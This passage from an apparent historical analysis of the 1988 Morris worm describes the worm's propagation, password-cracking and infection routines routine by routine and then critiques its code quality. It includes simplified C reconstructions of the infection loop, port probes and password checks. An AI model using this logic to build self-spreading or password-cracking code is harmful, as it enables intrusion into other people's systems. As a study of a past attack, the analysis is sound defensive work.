routine send_message was also called to cast suspicion on the folks
at Berkeley.

The code then entered an infinite loop: A call would be made to
cracksome followed by a call to other_sleep with a parameter of 30.
Then cracksome would be called again.  At this point, the process
would fork itself, and the parent would exit, leaving the child to
continue.  Next, the routines hg, ha, and hi would all be called to
infect other hosts.  If this combination of routines failed to infect
a new host, the routine hl would be called to infect a local host.
Thus, the code was aggressive about always infecting at least one
host each pass through this loop.  The logic here was faulty,
however, because if all known gateway hosts were infected, or a bad
set of host numbers was tried in ha, this code would call hl every
time through the loop.  Such behavior was one of the reasons hosts
became overloaded with worm processes: every pass through the loop,
each worm would likely be forced to infect another local host.
Considering that multiple worms could run on a host for some time
before one would exit, this could lead to an exponential growth of
worms in a LAN environment.

Next, the routine other_sleep was called with a timeout of 120.  A
check was then made to see if the worm had run for more than 12
hours.  If so, a call was made to h_clean.  Finally, a check was made
of the pleasequit and nextw variables (set in other_sleep or
checkother, and crack_2, respectively).  If pleasequit was nonzero
and nextw was greater than 10, the worm would exit.
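The loop just described can be summarized in the following outline (a
hypothetical reconstruction from the description above, not the
worm's own source; argument lists and the exact success test are
simplified, and start, pleasequit, and nextw are the variables
described in the text):

    /* Outline of doit's infinite loop. */
    for (;;) {
        cracksome();
        other_sleep(30);
        cracksome();
        if (fork() > 0)
            exit(0);              /* parent exits; child continues */
        infected  = hg();         /* gateways...                   */
        infected |= ha();         /* ...remote networks...         */
        infected |= hi();         /* ...equivalent hosts           */
        if (!infected)
            hl();                 /* fall back on local hosts      */
        other_sleep(120);
        if (time(0) - start > 12 * 60 * 60)
            h_clean();            /* drop 12-hour-old entries      */
        if (pleasequit && nextw > 10)
            exit(0);
    }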
5.2.3. attack_network

This routine was designed to infect random hosts on a subnet.  First,
for each of the network interfaces, it checked to see if the target
host was on a network to which the current host was directly
connected.  If so, the routine immediately returned.  Based on the
class of the netmask (e.g., Class A, Class B), the code constructed a
list of likely network numbers.  A special algorithm was used to make
good guesses at potential Class A host numbers.  All these
constructed host numbers were placed in a list, and the list was then
randomized using permute.  If the network was Class B, the
permutation was done to favor low-numbered hosts by doing two
separate permutations: the first six hosts in the output list were
guaranteed to be chosen from the first dozen (low-numbered) host
numbers generated.  The first 20 entries in the permuted list were
the only ones examined.

For each such IP address, its entry was retrieved from the global
list of hosts (if it was in the list).  If the host was in the list
and was marked as already infected or immune, it was ignored.
Otherwise, a check was made to see if the host supported the rsh
command (identifying it as existing and having BSD-derived networking
services) by calling supports_rsh.  If the host did support rsh, it
was entered into the hosts list if not already present, and a call to
infect was made for that host.  If a successful infection occurred,
the routine returned early with a value of TRUE (1).
5.2.4. attack_user

This routine was called after a user password was broken.  It has
some incorrect code and may not work properly on every architecture
because a subroutine call was missing an argument.  However, on Suns
and VAXen, the code will work because the missing argument was
supplied as an extra argument to the previous call, and the order of
the arguments on the stack matches between the two routines.  It was
largely a coincidence that this worked.  The routine attempted to
open a .forward file in the user's home directory, and then for each
host and user name present in that file, it called the hul routine.
It then did the same thing with the .rhosts file, if present, in the
user's home directory.
5.2.5. checkother

This routine checked to see if another worm was present on this
machine; it is a companion routine to other_sleep.  First, a random
value was checked: with a probability of 1 in 7, the routine returned
without ever doing anything.  These worms became immortal in the
sense that they never again participated in the process of thinning
out multiple local worms.  Otherwise, the worm created a socket and
tried to connect to the local ``worm port,'' 23357.  If the
connection was successful, an exchange of challenges was made to
verify that the other side was actually a fellow worm.  If so, a
random value was written to the other side, and a value was read from
the socket.  If the sum of the value sent plus the value read was
even, the local worm set its pleasequit variable to 1, thus marking
it for eventual self-destruction.  The socket was then closed, and
the worm opened a new socket on the same port (if it was not destined
to self-destruct) and set other_fd to that socket to listen for other
worms.

If any errors were encountered during this procedure, the worm
involved set other_fd to -1 and returned from the routine.  This
meant that any error caused the worm to be immortal, too.
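In outline, the thinning decision looks like the following sketch
(hypothetical code written for this report; the challenge exchange
and all socket handling on port 23357 are stubbed out with local
random values):

    #include <stdlib.h>

    static int pleasequit = 0;

    /* Stub for the dialog on the worm port: each side contributes
       a random value; the real exchange happened over TCP. */
    static long exchange_values(void)
    {
        long sent = random(), received = random();
        return sent + received;
    }

    static void checkother_sketch(void)
    {
        if (random() % 7 == 0)      /* 1 in 7: never thin; the worm
                                       becomes ``immortal'' */
            return;
        if (exchange_values() % 2 == 0)
            pleasequit = 1;         /* exit later, after partway
                                       through crack_2 */
    }

    int main(void)
    {
        checkother_sketch();
        return pleasequit;
    }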
5.2.6. crack_0

This routine first scanned the /etc/hosts.equiv file, adding new
hosts to the global list of hosts and setting the flags field to mark
them as equivalent.  Calls were made to h_name2host and getaddrs.
Next, a similar scan was made of the /.rhosts file using the exact
same calls.  The code then called setpwent to open the /etc/passwd
file.  A loop was performed as long as passwords could be read: Every
tenth entry, a call was made to other_sleep with a timeout of 0.  For
each user, an attempt was made to open the .forward file in the home
directory of that user and read the hostnames therein.  These
hostnames were also added to the host list and marked as equivalent.
The encrypted password, home directory, and gecos field for each user
were stored into the pwd structure.  After all user entries were
read, the endpwent routine was invoked, and the cmode variable was
set to 1.
5.2.7. crack_1

This routine tried to break passwords.  It looped until all accounts
had been tried, or until the next group of 50 accounts had been
tested.  In the loop, a call was made to other_sleep with a parameter
of zero each time the loop index modulo 10 was zero (i.e., every 10
calls), and repeated calls were made to try_password with the values
discussed in step 9b of Section 4.  Once all accounts had been tried,
the variable cmode was set to 2.
5.2.8. crack_2

This routine used the mini-dictionary in an attempt to break user
passwords (see Appendix A).  The dictionary was first permuted (using
the permute call).  Each word was decrypted in place by XORing its
bytes with 0x80.  The decrypted word was then passed to the
try_password routine for each user account.  The word was then
re-encrypted.  A global index, named nextw, was incremented to point
to the next dictionary entry.  The nextw index is also used in doit
to determine whether enough effort had been expended so that the worm
could ``...go gently into that good night.''  When no more words were
left, the variable cmode was set to 3.

There are two interesting points to note in this routine: the
reversed forms of these words were not tried, although that would
seem like a logical thing to do, and all words were encrypted and
decrypted in place rather than in a temporary buffer.  Decrypting in
place is less efficient than masking a copy into a scratch buffer,
since the re-encryption step then becomes unnecessary.  As discussed
in the next section, many examples of unnecessary effort such as this
were present in the program.  Furthermore, the entire mini-dictionary
was decrypted all at once rather than a word at a time.  This would
seem to lessen the benefit of encrypting those words at all, since
the entire dictionary would then be present in memory as plaintext
during the time all the words were tried.
5.2.9. crack_3

This was the last password cracking routine.  It opened
/usr/dict/words, and for each word found it called try_password
against each account.  If the first letter of the word was a capital,
it was converted to lower case and the word was retried.  After all
words were tried, the variable cmode was incremented and the routine
returned.  In this routine, no calls to other_sleep were
interspersed, thus leading to processes that ran for a long time
before checking for other worms on the local machine.  Also of note,
this routine did not try the reverse of words either!
5.2.10. cracksome

This routine was a simple switch statement on an external variable
named cmode; it implemented the five strategies discussed in step 9
of Section 4 of this paper.  State zero called crack_0, state one
called crack_1, state two called crack_2, and state three called
crack_3.  The default case simply returned.
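In outline (a sketch reconstructed from the description above, not
the worm's own source), the dispatch was simply:

    extern int cmode;
    extern void crack_0(void), crack_1(void),
                crack_2(void), crack_3(void);

    void cracksome(void)
    {
        switch (cmode) {
        case 0: crack_0(); break;  /* hosts.equiv, /.rhosts,
                                      .forward, /etc/passwd       */
        case 1: crack_1(); break;  /* obvious per-account guesses */
        case 2: crack_2(); break;  /* internal 432-word dictionary */
        case 3: crack_3(); break;  /* /usr/dict/words             */
        default: break;            /* state four: nothing left    */
        }
    }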
5.2.11. crypt

This routine took a key and a salt, then performed the UNIX password
encryption function on a block of zero bits.  The return value of the
routine was a pointer to a character string of 13 characters
representing the encoded password.  The routine was highly optimized
and differs considerably from the standard library version of the
same routine.  It called the following routines: compkeys, mungE,
des, and ipi.  A routine, setupE, was also present and was associated
with this code, but it was never referenced.  It appears to duplicate
the functionality of the mungE function.
  857. 5.2.12. h_addaddr
  858. This routine added alternate addresses to a host entry in the
  859. global list if they were not already present.
  860. 5.2.13. h_addname
  861. This routine added host aliases \(names\) to a given host entry.
  862. Duplicate entries were suppressed.
  863. 5.2.14. h_addr2host
  864. The host address provided to the routine was checked against each
  865. entry in the global host list to see if it was already present.
  866. If so, a pointer to that host entry was returned. If not, and if
  867. a parameter flag was set, a new entry was initialized with the
  868. argument address and a pointer to it was returned.
  869. 5.2.15. h_clean
  870. This routine traversed the host list and removed any entries
  871. marked as infected or immune \(leaving hosts not yet tried\).
  872. 5.2.16. h_name2host
  873. Just like h_addr2host except the comparison was done by name with
  874. all aliases.
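Taken together, the h_ routines describe a classic linked list of
host records. The sketch below is my own reconstruction of such a
structure and of the lookup-or-create behavior of h_addr2host; the
field names and sizes are hypothetical, since the actual
declarations are not given here:

    #include <stdlib.h>
    #include <netinet/in.h>

    #define MAXADDRS    6                /* hypothetical limit */
    #define HF_INFECTED 0x01
    #define HF_IMMUNE   0x02

    struct host {
        char          *names[MAXADDRS];  /* canonical name, aliases */
        struct in_addr addrs[MAXADDRS];  /* alternate addresses */
        int            naddrs, flags;
        struct host   *next;             /* singly linked global list */
    };

    static struct host *hosts;           /* head of the global list */

    /* Linear search by address; optionally allocate a new entry. */
    struct host *h_addr2host(struct in_addr a, int create) {
        struct host *h;
        int i;

        for (h = hosts; h != NULL; h = h->next)
            for (i = 0; i < h->naddrs; i++)
                if (h->addrs[i].s_addr == a.s_addr)
                    return h;
        if (!create)
            return NULL;
        h = calloc(1, sizeof(*h));       /* note: the worm often did
                                          * not check such returns */
        if (h != NULL) {
            h->addrs[0] = a;
            h->naddrs   = 1;
            h->next     = hosts;
            hosts       = h;
        }
        return h;
    }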
  875. 5.2.17. ha
  876. This routine tried to infect hosts on remote networks. First, it
  877. checked to see if the gateways list had entries; if not, it
  878. called rt_init. Next, it constructed a list of all IP addresses
  879. for gateway hosts that responded to the try_telnet routine. The
  880. list of host addresses was randomized by permute. Then, for each
  881. address in the list so constructed, the address was masked with
  882. the value returned by netmaskfor and the result was passed to the
  883. attack_network routine. If an attack was successful, the routine
  884. exited early with a return value of TRUE.
  885. 5.2.18. hg
  886. This routine attempted to infect gateway machines. It first
  887. called rt_init to reinitialize the list of gateways, and then for
  888. each gateway it called the main infection routine, infect, with
  889. the gateway as an argument. As soon as one gateway was
  890. successfully infected, the routine returned TRUE.
  891. 5.2.19. hi
  892. This routine tried to infect hosts whose entries in the hosts
  893. list were marked as equivalent. The routine traversed the global
  894. host list looking for such entries and then calling infect with
  895. those hosts. A successful infection returned early with the value
  896. TRUE.
  897. 5.2.20. hl
  898. This routine was intended to attack hosts on directly-connected
  899. networks. For each alternate address of the current host, the
  900. routine attack_network was called with an argument consisting of
  901. the address logically and-ed with the value of netmask for that
  902. address. A success caused the routine to return early with a
  903. return value of TRUE.
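Expressed in C, the hl strategy reduces to a few lines. The sketch
below reuses the host structure from the earlier sketch; me,
attack_network, and netmaskfor stand in for the worm routines of the
same names:

    extern struct host *me;          /* entry for the current host */
    extern int attack_network(unsigned long net);
    extern unsigned long netmaskfor(unsigned long addr);

    int hl(void) {
        int i;

        for (i = 0; i < me->naddrs; i++) {
            unsigned long a = me->addrs[i].s_addr;
            if (attack_network(a & netmaskfor(a))) /* mask to network */
                return 1;            /* early return of TRUE */
        }
        return 0;
    }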
  904. 5.2.21. hul
  905. This function attempted to attack a remote host via a particular
  906. user. It first checked to make sure that the host was not the
  907. current host and that it had not already been marked as infected.
  908. Next, it called getaddrs to be sure there was an address to be
  909. used. It examined the username for punctuation characters, and
  910. returned if any were found. It then called other_sleep with an
  911. argument of 1. Next, the code tried the attacks described in
912. §4-10. Calls were made to sendworm if either attack succeeded
  913. in establishing a shell on the remote machine.
  914. 5.2.22. if_init
  915. This routine constructed the list of interfaces using ioctl
  916. calls. In summary, it obtained information about each interface
  917. that was up and running, including the destination address in
  918. point-to-point links, and any netmask for that interface. It
  919. initialized the me pointer to the first non-loopback address
  920. found, and it entered all alternate addresses in the address
  921. list.
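This is the standard BSD idiom for walking the interface table. A
condensed sketch, with the error handling simplified and the netmask
and destination queries reduced to a comment, might look like the
following; it is a generic example, not the worm's code:

    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <sys/ioctl.h>
    #include <net/if.h>
    #include <netinet/in.h>

    void list_interfaces(void) {
        char buf[4096];
        struct ifconf ifc;
        struct ifreq *ifr, req;
        int s, n;

        if ((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
            return;
        ifc.ifc_len = sizeof(buf);
        ifc.ifc_buf = buf;
        if (ioctl(s, SIOCGIFCONF, &ifc) < 0) {
            close(s);
            return;
        }
        n = ifc.ifc_len / sizeof(struct ifreq);
        for (ifr = ifc.ifc_req; n-- > 0; ifr++) {
            strncpy(req.ifr_name, ifr->ifr_name, sizeof(req.ifr_name));
            if (ioctl(s, SIOCGIFFLAGS, &req) < 0)
                continue;
            if (!(req.ifr_flags & IFF_UP))
                continue;            /* only interfaces that are up */
            if (req.ifr_flags & IFF_LOOPBACK)
                continue;            /* skip the loopback interface */
            printf("%s\n", ifr->ifr_name);
            /* SIOCGIFNETMASK and SIOCGIFDSTADDR would be issued here
             * to collect the netmask and any point-to-point peer. */
        }
        close(s);
    }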
  922. 5.2.23. infect
  923. This was the main infection routine. First, the host argument was
  924. checked to make sure that it was not the current host, that it
  925. was not currently infected, and that it had not been determined
  926. to be immune. Next, a check was made to be sure that an address
  927. for the host could be found by calling getaddrs. If no address
  928. was found, the host was marked as immune and the routine returned
  929. FALSE. Next, the routine called other_sleep with a timeout of 1.
  930. Following that, it tried, in succession, calls to try_rsh,
  931. try_fingerd, and try_sendmail. If the calls to try_rsh or
  932. try_fingerd
  933. succeeded, the file descriptors established by those invocations
  934. were passed as arguments to the sendworm call. If any of the
  935. three infection attempts succeeded, infect returned early with a
  936. value of TRUE. Otherwise, the routine returned FALSE.
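The control flow just described fits in a short routine. The sketch
below reuses the host structure and flags from the earlier sketch;
the remaining externs are stubs standing in for the worm routines
named in the text, and the handling of the returned file descriptors
is simplified:

    extern int  host_is_me(struct host *);
    extern int  getaddrs(struct host *);
    extern void other_sleep(int);
    extern int  try_rsh(struct host *, int *, int *);
    extern int  try_fingerd(struct host *, int *, int *);
    extern int  try_sendmail(struct host *);
    extern int  sendworm(struct host *, int, int);

    int infect(struct host *h) {
        int in, out;

        if (host_is_me(h) || (h->flags & (HF_INFECTED | HF_IMMUNE)))
            return 0;
        if (!getaddrs(h)) {             /* no address: mark immune */
            h->flags |= HF_IMMUNE;
            return 0;
        }
        other_sleep(1);
        if (try_rsh(h, &in, &out))      /* rsh to a trusting host */
            return sendworm(h, in, out);
        if (try_fingerd(h, &in, &out))  /* fingerd buffer overrun */
            return sendworm(h, in, out);
        if (try_sendmail(h))            /* sendmail DEBUG dialog */
            return 1;
        return 0;
    }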
  937. 5.2.24. loadobject
  938. This routine read an object file into the objects structure in
  939. memory. The file was opened and the size found with a call to the
  940. library routine fstat. A buffer was malloc'd of the appropriate
  941. size, and a call to read was made to read the contents of the
  942. file. The buffer was encrypted with a call to xorbuf, then
  943. transferred into the objects array. The suffix of the name
944. (e.g., sun3.o, l1.c, vax.o) was saved in a field in the
  945. structure, as was the size of the object.
  946. 5.2.25. makemagic
  947. The routine used the library random call to generate a random
  948. number for use as a challenge number. Next, it tried to connect
949. to the telnet port (#23) of the target host, using each
  950. alternate address currently known for that host. If a successful
  951. connection was made, the library call getsockname was called to
  952. get the canonical IP address of the current host relative to the
  953. target. Next, up to 1024 attempts were made to establish a TCP
  954. socket, using port numbers generated by taking the output of the
  955. random number generator modulo 32767. If the connection was
  956. successful, the routine returned the port number, the file
  957. descriptor of the socket, the canonical IP address of the current
  958. host, and the challenge number.
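The port-hunting loop is worth illustrating, since it explains both
the 1024-attempt limit and the modulo-32767 port selection. This is
a generic reconstruction; the names and the listen backlog are my
own:

    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/socket.h>
    #include <netinet/in.h>

    int make_local_socket(int *portp) {
        struct sockaddr_in sin;
        int s, i;

        for (i = 0; i < 1024; i++) {
            if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0)
                return -1;
            memset(&sin, 0, sizeof(sin));
            sin.sin_family      = AF_INET;
            sin.sin_addr.s_addr = INADDR_ANY;
            sin.sin_port        = htons(random() % 32767);
            if (bind(s, (struct sockaddr *)&sin, sizeof(sin)) == 0 &&
                listen(s, 1) == 0) {
                *portp = ntohs(sin.sin_port);
                return s;            /* success: hand back the socket */
            }
            close(s);                /* port in use: try another */
        }
        return -1;                   /* gave up after 1024 attempts */
    }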
  959. 5.2.26. netmaskfor
  960. This routine stepped through the interfaces array and checked the
  961. given address against those interfaces. If it found that the
  962. address was reachable through a connected interface, the netmask
  963. returned was the netmask associated with that interface.
  964. Otherwise, the return was the default netmask based on network
965. type (Class A, Class B, Class C).
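The fallback case follows the old classful addressing rules, for
which the standard macros in <netinet/in.h> suffice. A minimal
version of that default computation:

    #include <netinet/in.h>

    /* addr is in host byte order */
    unsigned long default_netmask(unsigned long addr) {
        if (IN_CLASSA(addr))
            return IN_CLASSA_NET;    /* 255.0.0.0 */
        if (IN_CLASSB(addr))
            return IN_CLASSB_NET;    /* 255.255.0.0 */
        return IN_CLASSC_NET;        /* 255.255.255.0 */
    }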
  966. 5.2.27. other_sleep
  967. This routine checked a global variable named other_fd. If the
  968. variable was less than zero, the routine simply called sleep with
  969. the provided timeout argument, then returned. Otherwise, the
  970. routine waited on a select system call for up to the value of the
  971. timeout. If the timeout expired, the routine returned. Otherwise,
  972. if the select return code indicated there was input pending on
  973. the other_fd descriptor, it meant there was another worm on the
  974. current machine. A connection was established and an exchange of
  975. ``magic'' numbers was made to verify identity. The local worm
976. then wrote a random number (produced by random) to the other
  977. worm via the socket. The reply was read and a check was made to
978. ensure that the response came from the localhost (127.0.0.1).
  979. The file descriptor was closed. If the random value sent plus the
  980. response was an odd number, the other_fd variable was set to -1
  981. and the pleasequit variable was set to 1. This meant that the
982. local worm would die when conditions were right (cf. doit),
  983. and that it would no longer attempt to contact other worms on the
  984. local machine. If the sum was even, the other worm was destined
  985. to die.
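The sleep-or-listen choice is the interesting part of this routine,
and it is a textbook use of select. The following sketch shows only
that skeleton; the magic-number exchange and the parity decision are
left as a comment, since the exact dialog is described above:

    #include <unistd.h>
    #include <sys/select.h>
    #include <sys/time.h>

    extern int other_fd;             /* listening socket, or -1 */

    void other_sleep(int timeout) {
        fd_set readfds;
        struct timeval tv;

        if (other_fd < 0) {          /* no one to listen for */
            sleep(timeout);
            return;
        }
        FD_ZERO(&readfds);
        FD_SET(other_fd, &readfds);
        tv.tv_sec  = timeout;
        tv.tv_usec = 0;
        if (select(other_fd + 1, &readfds, NULL, NULL, &tv) > 0 &&
            FD_ISSET(other_fd, &readfds)) {
            /* Another worm is calling: accept the connection, verify
             * the magic numbers, exchange random values, and let the
             * parity of the sum decide which worm is to die. */
        }
    }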
  986. 5.2.28. permute
  987. This routine randomized the order of a list of objects. This was
  988. done by executing a loop once for each item in the list. In each
  989. iteration of the loop, the random number generator was called
  990. modulo the number of items in the list. The item in the list
  991. indexed by that value was swapped with the item in the list
992. indexed by the current loop value (via a call to bcopy).
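This shuffle can be reconstructed almost verbatim from the
description; the version below keeps the bcopy swap mentioned in the
text and assumes, purely for the scratch buffer, that no element
exceeds 256 bytes:

    #include <stdlib.h>
    #include <strings.h>

    void permute(void *list, int nel, int size) {
        char *base = list, tmp[256];
        int i, j;

        for (i = 0; i < nel; i++) {
            j = random() % nel;      /* random partner for slot i */
            bcopy(base + i * size, tmp, size);
            bcopy(base + j * size, base + i * size, size);
            bcopy(tmp, base + j * size, size);
        }
    }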
  993. 5.2.29. rt_init
  994. This initialized the list of gateways. It started by setting an
  995. external counter, ngateways, to zero. Next, it invoked the
  996. command ``/usr/ucb/netstat -r -n'' using a popen call. The code
  997. then looped while output was received from the netstat command: A
  998. line was read. A call to other_sleep was made with a timeout of
  999. zero. The input line was parsed into a destination and a gateway.
  1000. If the gateway was not a valid IP address, or if it was the
1001. loopback address (127.0.0.1), it was discarded. The value was
  1002. then compared against all the gateway addresses already known;
  1003. duplicates were skipped. It was also compared against the list of
1004. local interfaces (local networks), and discarded if a
  1005. duplicate. Otherwise, it was added to the list of gateways and
  1006. the counter incremented.
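Collecting routes by running netstat through popen is simple to
sketch. In the generic version below the duplicate screening is
reduced to a comment, and the parsing is simplified to the two
fields the text says were used:

    #include <stdio.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>

    int collect_gateways(void) {
        FILE *fp = popen("/usr/ucb/netstat -r -n", "r");
        char line[128], dest[64], gate[64];
        in_addr_t a;
        int n = 0;

        if (fp == NULL)
            return 0;
        while (fgets(line, sizeof(line), fp) != NULL) {
            if (sscanf(line, "%63s %63s", dest, gate) != 2)
                continue;            /* header or blank line */
            a = inet_addr(gate);
            if (a == INADDR_NONE)
                continue;            /* not a valid IP address */
            if (a == inet_addr("127.0.0.1"))
                continue;            /* skip the loopback address */
            /* ...skip entries already known, and entries matching a
             * local interface, then record the gateway... */
            n++;
        }
        pclose(fp);
        return n;
    }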
  1007. 5.2.30. scan_gateways
  1008. First, the code called permute to randomize the gateways list.
1009. Next, it looped over the gateway list, or over just its first
1010. 20 entries if there were more: A call was made to other_sleep with a timeout of zero. The
  1011. gateway IP address was searched for in the host list; a new entry
  1012. was allocated for the host if none currently existed. The gateway
  1013. flag was set in the flags field of the host entry. A call was
  1014. made to the library routine gethostbyaddr with the IP number of
  1015. the gateway. The name, aliases and address fields were added to
  1016. the host list, if not already present. Then a call was made to
  1017. gethostbyname and alternate addresses were added to the host
  1018. list. After this loop was executed, a second loop was started
  1019. that did effectively the same thing as the first! There is no
  1020. clear reason why this was done, unless it is a remnant of earlier
  1021. code, or a stub for future additions.
  1022. 5.2.31. send_message
  1023. This routine made a call to random and 14 out of 15 times
  1024. returned without doing anything. In the 15th case, it opened a
  1025. stream socket to host ``ernie.berkeley.edu'' and then tried to
  1026. send an uninitialized byte using the sendto call. This would not
1027. work (using a UDP send on a TCP socket).
  1028. 5.2.32. sendworm
  1029. This routine sent the worm code over a connected TCP circuit to a
  1030. remote machine. First it checked to make sure that the objects
1031. table held a copy of the l1.c code (see Appendix B). Next, it
  1032. called makemagic to get a local socket established and to
  1033. generate a challenge string. Then, it encoded and wrote the
1034. script detailed previously in §4-2a. Finally, it called
  1035. waithit and returned the result code of that routine. The object
  1036. files shipped across the link were decrypted in memory first by a
  1037. call to xorbuf and then re-encrypted afterwards.
  1038. 5.2.33. supports_rsh
  1039. This routine determined if the target host, specified as an
1040. argument, supported the BSD-derived rsh protocol. It did this by
  1041. creating a socket and attempting a TCP connection to port 514 on
  1042. the remote machine. A timeout or connect failure caused a return
  1043. of FALSE; otherwise, the socket was closed and the return value
  1044. was TRUE.
  1045. 5.2.34. supports_telnet
  1046. This routine determined if a host was reachable and supported the
1047. telnet protocol (i.e., was probably not a router or similar
1048. ``dumb'' box). It was similar to supports_rsh in nature. The
  1049. code established a socket, connected to the remote machine on
  1050. port 23, and returned FALSE if an error or timeout occurred;
  1051. otherwise, the socket was closed and TRUE was returned.
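Both probes are instances of one generic test: can a TCP connection
be completed to a given port? A sketch of that shared idiom, with
the worm's timeout handling omitted, follows:

    #include <string.h>
    #include <unistd.h>
    #include <sys/socket.h>
    #include <netinet/in.h>

    int port_open(struct in_addr host, int port) {
        struct sockaddr_in sin;
        int s;

        if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0)
            return 0;
        memset(&sin, 0, sizeof(sin));
        sin.sin_family = AF_INET;
        sin.sin_addr   = host;
        sin.sin_port   = htons(port);
        if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
            close(s);
            return 0;                /* failure or timeout: FALSE */
        }
        close(s);                    /* reachable: close and report */
        return 1;                    /* port 514 for rsh, 23 for telnet */
    }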
  1052. 5.2.35. try_fingerd
  1053. This routine tried to establish a connection to a remote finger
  1054. daemon on the given host by connecting to port 79. If the
  1055. connection succeeded, it sent across an overfull buffer as
1056. described in §4-8b and waited to see if the other side became
  1057. a shell. If so, it returned the file descriptors to the caller;
  1058. otherwise, it closed the socket and returned a failure code.
  1059. 5.2.36. try_password
  1060. This routine called crypt with the password attempt and compared
  1061. the result against the encrypted password in the pwd entry for
  1062. the current user. If a match was found, the unencrypted password
  1063. was copied into the pwd structure, and the routine attack_user
  1064. was invoked.
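The comparison is the standard one for UNIX password files, and a
sketch follows. Note that the worm used its own fast crypt; here the
library crypt(3) stands in, and attack_user is a stub for the worm
routine of that name:

    #include <string.h>
    #include <pwd.h>

    extern char *crypt(const char *key, const char *salt);
    extern void attack_user(struct passwd *pw, const char *cleartext);

    int try_password(struct passwd *pw, const char *guess) {
        /* crypt takes its two-character salt from the start of the
         * stored field, so the stored field can be passed directly */
        if (strcmp(crypt(guess, pw->pw_passwd), pw->pw_passwd) == 0) {
            attack_user(pw, guess);  /* remember cleartext and attack */
            return 1;
        }
        return 0;
    }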
  1065. 5.2.37. try_rsh
  1066. This function created two pipes and then forked a child process.
  1067. The child process attempted to rexec a remote shell on the host
  1068. specified in the parameters, using the specified username and
  1069. password. Then the child process tried to invoke the rsh command
  1070. by attempting to run, in order, ``/usr/ucb/rsh,''
  1071. ``/usr/bin/rsh,'' and ``/bin/rsh.'' If the remote shell
  1072. succeeded, the function returned the file descriptors of the open
  1073. pipe. Otherwise, it closed all file descriptors, killed the child
  1074. with a SIGKILL, and reaped it with a call to wait3.
  1075. 5.2.38. try_sendmail
  1076. This routine attempted to establish a connection to the SMTP port
1077. (#25) on the remote host. If successful, it conducted the
1078. dialog explained in §4-2b. It then called the waithit routine
  1079. to see if the infection ``took.'' Return codes were checked after
  1080. each line was transmitted, and if a return code indicated a
  1081. problem, the routine aborted after sending a ``quit'' message.
  1082. 5.2.39. waithit
  1083. This function acted as the bootstrap server for a vector program
  1084. on a remote machine. It waited for up to 120 seconds on the
  1085. socket created by the makemagic routine, and if no connection was
  1086. made it closed the socket and returned a failure code. Likewise,
  1087. if the first thing received was not the challenge string shipped
  1088. with the bootstrap program, the socket was closed and the routine
  1089. returned. The routine decrypted each object file using xorbuf and
1090. sent it across the connection to the vector program (see
1091. Appendix B). Then a script was transmitted to compile and run
1092. the vector. This was described in §4-4. If the remote host was
  1093. successfully infected, the infected flag was set in the host
  1094. entry and the socket closed. Otherwise, the routine sent rm
  1095. command strings to delete each object file. The function returned
  1096. the success or failure of the infection.
  1097. 5.2.40. xorbuf
  1098. This routine was somewhat peculiar. It performed a simple
  1099. encryption/decryption function by XORing the buffer passed as an
  1100. argument with the first 10 bytes of the xorbuf routine itself!
1101. This code would not work on a machine with a split instruction
1102. and data (I/D) space or on tagged architectures.
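The trick is easy to reconstruct, and seeing it spelled out makes
the portability problem obvious. In the sketch below the function
reads its own machine code as the key; taking a function's address
as a data pointer is exactly what a split I/D machine forbids:

    void xorbuf(char *buf, int len) {
        char *key = (char *)xorbuf;  /* our own first code bytes */
        int i;

        for (i = 0; i < len; i++)
            buf[i] ^= key[i % 10];   /* cycle over a 10-byte key */
    }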
  1103. 6. Analysis of the Code
  1104. 6.1. Structure and Style
  1105. An examination of the reverse-engineered code of the worm is
  1106. instructive. Although it is not the same as reading the original
1107. code, it does reveal some characteristics of the author(s). One
  1108. conclusion that may surprise some people is that the quality of
  1109. the code is mediocre, and might even be considered poor. For
  1110. instance, there are places where calls are made to functions with
  1111. either too many or too few arguments. Many routines have local
  1112. variables that are either never used, or are potentially used
  1113. before they are initialized. In at least one location, a struct
  1114. is passed as an argument rather than the address of the struct.
1115. There is also dead code: routines that are never referenced,
1116. and code that cannot be executed because of conditions that
1117. are never met (possibly bugs). It appears that the author(s)
  1118. never used the lint utility on the program. At many places in the
  1119. code, there are calls on system routines and the return codes are
  1120. never checked for success. In many places, calls are made to the
1121. system heap routine, malloc, and the result is immediately used
  1122. without any check. Although the program was configured not to
  1123. leave a core file or other evidence if a fatal failure occurred,
  1124. the lack of simple checks on the return codes is indicative of
  1125. sloppiness; it also suggests that the code was written and run
  1126. with minimal or no testing. It is certainly possible that some
  1127. checks were written into the code and elided subject to
  1128. conditional compilation flags. However, there would be little
  1129. reason to remove those checks from the production version of the
  1130. code. The structures chosen for some of the internal data are
  1131. also revealing. Everything was represented as linked lists of
  1132. structures. All searches were done as linear passes through the
  1133. appropriate list. Some of these lists could get quite long and
1134. doubtless considerable CPU time was spent by the worm just
  1135. maintaining and searching these lists. A little extra code to
  1136. implement hash buckets or some form of sorted lists would have
  1137. added little overhead to the program, yet made it much more
1138. efficient (and thus quicker to infect other hosts and less
1139. obvious to system watchers). Linear lists may be easy to code,
  1140. but any experienced programmer or advanced CS student should be
  1141. able to implement a hash table or lists of hash buckets with
  1142. little difficulty. Some effort was duplicated in spots. An
  1143. example of this was in the code that tried to break passwords.
  1144. Even if the password to an account had been found in an earlier
  1145. stage of execution, the worm would encrypt every word in the
  1146. dictionary and attempt a match against it. Similar redundancy can
  1147. be found in the code to construct the lists of hosts to infect.
  1148. There are locations in the code where it appears that the
1149. author(s) meant to execute a particular function but used the
  1150. wrong invocation. The use of the UDP send on a TCP socket is one
  1151. glaring example. Another example is at the beginning of the
  1152. program where the code sends a KILL signal to its parent process.
1153. The surrounding code gives a strong indication that the author
1154. actually meant to do a killpg instead but used the wrong call.
  1155. The one section of code that appears particularly well-thought-
  1156. out involves the crypt routines used to check passwords. As has
  1157. been noted in [Seel88], this code is nine times faster than the
  1158. standard Berkeley crypt function. Many interesting modifications
  1159. were made to the algorithm, and the routines do not appear to
  1160. have been written by the same author as the rest of the code.
1161. Additionally, the routines involved have some support for both
1162. encryption and decryption -- even though only encryption was
1163. needed for the worm. This supports the assumption that this
1164. routine was written by someone other than the author(s) of the
  1165. program, and included with this code. It would be interesting to
  1166. discover where this code originated and how it came to be in the
  1167. Worm program. The program could have been much more virulent had
